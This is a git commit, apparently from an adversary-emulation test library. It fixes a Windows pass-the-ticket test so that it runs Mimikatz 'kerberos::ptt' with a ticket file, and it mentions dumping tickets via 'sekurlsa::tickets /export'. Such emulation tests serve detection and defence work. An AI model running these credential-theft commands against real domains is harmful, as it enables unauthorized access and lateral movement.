T1550.003 pass the ticket by mimikatz patch (#1682)

* Update T1550.003.md

To avoid mimikatz failure and more useful argument description

* Update T1550.003.yaml

To avoid to fail mimikatz  kerberos::ptt and be more easier to understand about argument.

* Update T1550.003.yaml

* Update T1550.003.md

* Update T1550.003.md

* Update T1550.003.yaml
This commit is contained in:
hackeT
2021-12-09 01:56:45 +09:00
committed by GitHub
parent d07703afe0
commit 5b360eb744
2 changed files with 6 additions and 11 deletions
+2 -3
View File
@@ -32,8 +32,7 @@ Similar to PTH, but attacking Kerberos
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user_name | username | String | Administrator|
| domain | domain | String | atomic.local|
| ticket | Ticket file name usually format of 'id-username\@domain\.kirbi' (e.g. can be dumped by "sekurlsa::tickets /export" module) | String | |
| mimikatz_exe | Path of the Mimikatz binary | Path | PathToAtomicsFolder\T1550.003\bin\mimikatz.exe|
@@ -41,7 +40,7 @@ Similar to PTH, but attacking Kerberos
```cmd
#{mimikatz_exe} # kerberos::ptt #{user_name}@#{domain}
#{mimikatz_exe} "kerberos::ptt #{ticket}"
```
+4 -8
View File
@@ -8,14 +8,10 @@ atomic_tests:
supported_platforms:
- windows
input_arguments:
user_name:
description: username
ticket:
description: Ticket file name usually format of 'id-username\@domain.kirbi' (e.g. can be dumped by "sekurlsa::tickets /export" module)
type: String
default: Administrator
domain:
description: domain
type: String
default: atomic.local
default:
mimikatz_exe:
description: Path of the Mimikatz binary
type: Path
@@ -35,5 +31,5 @@ atomic_tests:
Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force
executor:
command: |
#{mimikatz_exe} # kerberos::ptt #{user_name}@#{domain}
#{mimikatz_exe} "kerberos::ptt #{ticket}"
name: command_prompt